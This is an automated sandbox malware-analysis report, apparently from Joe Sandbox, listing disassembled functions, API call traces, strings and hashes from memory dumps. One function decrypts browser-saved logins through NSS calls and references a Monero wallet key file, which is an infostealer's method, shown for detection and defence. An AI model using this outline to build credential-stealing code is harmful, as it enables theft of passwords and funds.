Opcode ID: 6f53099f4e185b59b4b24b42b03326a3169c9a9f95224ed6a578b35b42b4ff73
Instruction ID: adb680dfa796be1a59b7394f4872e84658f22daaa1d494806c7099379ce7beda
Opcode Fuzzy Hash: 6f53099f4e185b59b4b24b42b03326a3169c9a9f95224ed6a578b35b42b4ff73
Instruction Fuzzy Hash: 114148F3A1C2089BE3487E38EC4576BB7D6DBD4310F1A863DE68687B44FA3895058646

Function 0095B323 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3137a3843005060be218c3a0add31f4e687dea5bf29fbe1f19017cf92fb3dae3
Instruction ID: 0e754b63d2ff6a753910a026c41dc53edc9412ecc8059b0f0ee7ed46915c75bf
Opcode Fuzzy Hash: 3137a3843005060be218c3a0add31f4e687dea5bf29fbe1f19017cf92fb3dae3
Instruction Fuzzy Hash: A2314AB250C3089FE305BE69D84167AFBE8FF58360F56082DE6C083600EB7599558B93

Function 00489750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C6455F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C61E1A5), ref: 6C645606
LoadLibraryW.KERNEL32(gdi32,?,6C61E1A5), ref: 6C64560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C645633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C64563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C64566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C64567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C645696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6456B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6456CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6456E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6456FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C645716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C64572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C645748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C645761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C64577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C645793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6457A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6457BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6457D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6457EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6457FF

Strings

StretchDIBits, xrefs: 6C6457CC
DeleteObject, xrefs: 6C6457F9
EnableNonClientDpiScaling, xrefs: 6C645666
SetWindowLongPtrW, xrefs: 6C6457B7
GetWindowDC, xrefs: 6C645710
ShowWindow, xrefs: 6C6456DE
ReleaseDC, xrefs: 6C645742
GetThreadDpiAwarenessContext, xrefs: 6C64562D
GetDpiForWindow, xrefs: 6C645690
gdi32, xrefs: 6C64560A
LoadCursorW, xrefs: 6C645774
user32, xrefs: 6C645601
CreateWindowExW, xrefs: 6C6456C5
AreDpiAwarenessContextsEqual, xrefs: 6C645637
SetWindowPos, xrefs: 6C6456F7
GetSystemMetricsForDpi, xrefs: 6C645677
LoadIconW, xrefs: 6C64575B
GetMonitorInfoW, xrefs: 6C6457A2
CreateSolidBrush, xrefs: 6C6457E4
FillRect, xrefs: 6C645729
RegisterClassW, xrefs: 6C6456AC
MonitorFromWindow, xrefs: 6C64578D

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 4dd93dd3f198aa54c55581b473321224d3484a382aa1ba7ee5cedad919771f95
Instruction ID: 4bafbc313a21eb05b440e61a2e9eb58d45d00f0413fb565fc612663d730ea508
Opcode Fuzzy Hash: 4dd93dd3f198aa54c55581b473321224d3484a382aa1ba7ee5cedad919771f95
Instruction Fuzzy Hash: 5051F374611712AFDB019F378D94A363AF8AB56385F10C42AB921E2A51EF74CC019F6F

Function 6C62CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C5F582D), ref: 6C62CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C5F582D), ref: 6C62CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C65FE98,?,?,?,?,?,6C5F582D), ref: 6C62CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C5F582D), ref: 6C62CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C5F582D), ref: 6C62CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C5F582D), ref: 6C62CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5F582D), ref: 6C62CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C62CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C62CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C62CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C62CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C62CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C62CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C62CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C62CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C62CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C62CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C62CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C62CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C62CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C62CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C62CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C62CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C62CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C62CE8A

Strings

preferencereads, xrefs: 6C62CD92
audiocallbacktracing, xrefs: 6C62CDD4
markersallthreads, xrefs: 6C62CE42
mainthreadio, xrefs: 6C62CC7C
ipcmessages, xrefs: 6C62CDBE
screenshots, xrefs: 6C62CCD4
unregisteredthreads, xrefs: 6C62CE58
cpuallthreads, xrefs: 6C62CE16
fileio, xrefs: 6C62CC92
fileioall, xrefs: 6C62CCA8
power, xrefs: 6C62CE84
noiostacks, xrefs: 6C62CCBE
stackwalk, xrefs: 6C62CCF8
Unrecognized feature "%s"., xrefs: 6C62CEA0
seqstyle, xrefs: 6C62CCE6
notimerresolutionchange, xrefs: 6C62CE00
samplingallthreads, xrefs: 6C62CE2C
java, xrefs: 6C62CC37
default, xrefs: 6C62CC21
nativeallocations, xrefs: 6C62CDA8
jsallocations, xrefs: 6C62CD0E
leaf, xrefs: 6C62CC66
processcpu, xrefs: 6C62CE6E
nostacksampling, xrefs: 6C62CD7C

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: e143163a1bbb891cd5168b9d8d8a2bc0b18ff1c789ba0b73b015c1ed6ee80d60
Instruction ID: 027ca9cd1d95663c32e448d32a0f067a143f77a5d3df238179a7344596919783
Opcode Fuzzy Hash: e143163a1bbb891cd5168b9d8d8a2bc0b18ff1c789ba0b73b015c1ed6ee80d60
Instruction Fuzzy Hash: 9F519BC194562971FB0031156D20BEA1489EF5734AF604835DE4BA1E81FF0DD62ACDBF

Function 6C5F4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5F4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5F44B2,6C66E21C,6C66F7F8), ref: 6C5F473E
Part of subcall function 6C5F4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C5F474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C5F44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C5F44D2
InitOnceExecuteOnce.KERNEL32(6C66F80C,6C5EF240,?,?), ref: 6C5F451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5F455C
LoadLibraryW.KERNEL32(?), ref: 6C5F4592
InitializeCriticalSection.KERNEL32(6C66F770), ref: 6C5F45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C5F45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C5F45BB
InitOnceExecuteOnce.KERNEL32(6C66F818,6C5EF240,?,?), ref: 6C5F4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C5F4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C5F4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5F466D
VerSetConditionMask.NTDLL ref: 6C5F469F
VerSetConditionMask.NTDLL ref: 6C5F46AB
VerSetConditionMask.NTDLL ref: 6C5F46B2
VerSetConditionMask.NTDLL ref: 6C5F46B9
VerSetConditionMask.NTDLL ref: 6C5F46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5F46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C5F46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C5F46FD

Strings

Gfl, xrefs: 6C5F44FC
user32.dll, xrefs: 6C5F4557, 6C5F463F
NativeNtBlockSet_Write, xrefs: 6C5F46F7
WRusr.dll, xrefs: 6C5F44B5
l, xrefs: 6C5F4578
kernel32.dll, xrefs: 6C5F44CD

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gfl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3932425247
Opcode ID: a9ff3564416246c5426e9a8ffa7a9244547a4e5ec85e07923adff1e8898542e4
Instruction ID: 9086ac0090bc52d8e370bf1476f67a2318964fffb1ac159697cc92a953951e07
Opcode Fuzzy Hash: a9ff3564416246c5426e9a8ffa7a9244547a4e5ec85e07923adff1e8898542e4
Instruction Fuzzy Hash: C76136B0604344AFEB04DF63CD85BA97BB8EB86308F148558E5149BA41D7B08946CF9B

Function 0047C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0047C9A5

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0110D038,00000000,?,0049144C,00000000,?,?), ref: 0047CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0047CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0047CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0047CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0047CAD9
StrStrA.SHLWAPI(?,0110D0C8,00490B52), ref: 0047CAF7
StrStrA.SHLWAPI(00000000,0110D008), ref: 0047CB1E
StrStrA.SHLWAPI(?,0110D800,00000000,?,00491458,00000000,?,00000000,00000000,?,01108F88,00000000,?,00491454,00000000,?), ref: 0047CCA2
StrStrA.SHLWAPI(00000000,0110D6E0), ref: 0047CCB9

Part of subcall function 0047C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0047C871
Part of subcall function 0047C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0047C87C
Part of subcall function 0047C820: PK11_GetInternalKeySlot.NSS3 ref: 0047C88A
Part of subcall function 0047C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0047C8A5
Part of subcall function 0047C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0047C8EB
Part of subcall function 0047C820: PK11_FreeSlot.NSS3(?), ref: 0047C961

StrStrA.SHLWAPI(?,0110D6E0,00000000,?,0049145C,00000000,?,00000000,01109088), ref: 0047CD5A
StrStrA.SHLWAPI(00000000,011091F8), ref: 0047CD71

Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B46), ref: 0047C943
Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B47), ref: 0047C957
Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B4E), ref: 0047C978

lstrlen.KERNEL32(00000000), ref: 0047CE44
CloseHandle.KERNEL32(00000000), ref: 0047CE9C
NSS_Shutdown.NSS3 ref: 0047CEAA

Strings

, xrefs: 0047C9C6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 80ca1fc82f526cdb5caf49520d2ef79b5f8fc50ec19d366d4e4126a6af3fc8d5
Instruction ID: 486aa5acc578a9f267a0faf7b9e006846c4399b808ec0d14607a8e425fac88e0
Opcode Fuzzy Hash: 80ca1fc82f526cdb5caf49520d2ef79b5f8fc50ec19d366d4e4126a6af3fc8d5
Instruction Fuzzy Hash: F5E110B1800108ABDB14FBA5DC91FEE7779AF14304F40456FF10662191EF786A9ACB7A

Function 00489010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0048906C

Strings

image/jpeg, xrefs: 00489136

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
